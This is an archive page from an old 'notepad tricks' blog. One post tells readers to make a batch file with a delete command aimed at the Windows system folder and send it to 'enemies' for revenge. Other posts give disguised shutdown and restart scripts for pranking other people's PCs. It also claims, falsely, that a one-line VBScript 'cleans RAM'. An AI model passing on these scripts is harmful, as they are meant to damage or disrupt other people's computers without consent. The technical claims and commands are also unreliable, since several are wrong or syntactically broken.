Showing posts with label notepad tricks. Show all posts
Showing posts with label notepad tricks. Show all posts

Saturday, October 15, 2011

Clean RAM Using Notepad


Hello!
         It's a very simple cool notepad trick which free up the RAM with unused junk data to speedup the system or processing speed.

To Clean up your RAM(Random Access Memory) easily just follow these simple steps.

STEPS:
1- Open totepad
2- Type FreeMem=Space(64000000) in it.
3- Save it as CleanRAM.vbs.
4- Now open it and your RAM will be free!



Monday, August 15, 2011

How To Make A Real Virus



Hello!
         Have you ever tried to take a revenge, but failed? or tried to make a virus?
In this post I'm gonna show you how to make a virus and completely destroy the PC of your enemy. As I always say "no mercy for enemies", so I'm gonna show you how to delete your enemie's windows. Before this post I showed you how to Make a fake shocking virus..!! but this time, its a real tragedy for your enemies...
To make a virus that deletes your victim's windows, just follow these simple steps..




STEPS:
1- Open notepad.
2- Type the below simple commands in it.
@echo off del c:\\windows\system 32
3- Now save it as  file.bat
4- Done!
After that, DON'T EVER TRY TO OPEN IT AT ANY COST. Now go ahead and send it to your enemies and take an awesome revenge.
Actually it's not a virus, its just a command to delete windows...




Friday, August 12, 2011

Some Cool PC Tricks



KNOW IF YOUR COMPUTER IS MALE OR FEMALE:
Hello!
         Do you wanna know if your computer is a male or female? 
In this post I'm gonna show you how to make your computer speak to know weather it  is a male or a female.
1- Open notepad paste these blue text in it and save it as File.vbs

CreateObject("SAPI.SpVoice").Speak"I Love You"
2- Open it and it will speak!


OPEN YOUR CD DRIVE:
To open your CD drive without pressing button, just paste this blue text in notepad and save it as file.vbs and after opening the file your CD drive will open.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count = 1 then
for i = 0 to colCDROMS.Count - 1
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
Next ' cdrom
end if


MAKE MATRIX:
Type this blue text in notepad and save it as File.bat and after opnening that file you will see cool matrix...
@echo off
:loop
COlor 0A
Title J J f f g g g g

echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop



Friday, August 5, 2011

Check Your Antivirus Program



Hello!
         Sometimes we install an Antivirus and think that it will save my computer from any kind of virus... But its not true. Some of the antiviruses are not good enough to protect your computer, they just stay in your PC, do nothing and let the virus harm your Computer. So what we can do to check our antivirus program?

In this post I'm gonna show you how to make a simple text file an harmless virus to check whether our antivirus is working or not. 
To make a harmless virus just Copy and Paste this Blue text given below in a text file and save it as a .com file.


Text:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*



If your antivirus detects it as a virus then relax because your antivirus is working, but if it dosen't detects it the delete that antivirus and install a new one.







Wednesday, July 27, 2011

Biggest Hacking Prank!





Hello!
         In this post I'm gonna show you how to play a hacking prank on your friend. Its just a simple fake virus it won't harm anyone, its absolutely harmless...
When anyone open it he/she will see a message like




"You've been Hacked!!!!! Click Ok to delete your facebook account."


To make it, just right click on your desktop, click on new, click on Text Document. Now type this text in it.
  
@echo off
msg * You've been Hacked!!!!! Click Ok to delete your facebook account. 




PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT IS NOW BEING DELETED!!! PLEASE WAIT ……….


Now save it as a .bat file. Example: file.bat


Done!
Now if anyone opens it he/she will get shocked..!! :)



(Watch this to see how to do it)





Sunday, July 10, 2011

Make a fake shocking virus..!!



Hello!
         Today I am going to show you how to make a simple fake virus and shutdown someone's PC with it...
Actually its a command to shutdown the PC. So, to make it follow these simple steps.
STEPS:

1- Right click on your desktop.
2- Click on NEW.
3- Click on SHORTCUT. A file will open like this.




4- In that box type this:

shutdown -s -t 3 -c "Your shocking message"
the 3 after -t are the seconds after which the computer will turn off. Write 0 if you want to turn off the computer immediately after opening the file, and write whatever you want in the place of  "Your shocking message" like "You've Been Hacked!!".
5- Click NEXT.
6- Write the name of the file, don't write shutdown because it is too obvious, write anything else...
7- Click FINISH.
CHANGE ICON OF THE VIRUS:
Now, to make your virus a bit attractive you have to change the icon of the virus....
1- Right click on the virus.
2- Click on PROPERTIES.
3- Click in change icon...
4- A popup will open.. Just hit enter...
5- Select your desire icon...
Now, if anyone open this file, his PC will automatically shutdown....
The rest you know how to enjoy...!! :)

AS ALWAYS COMMENTS ARE WELCOME!!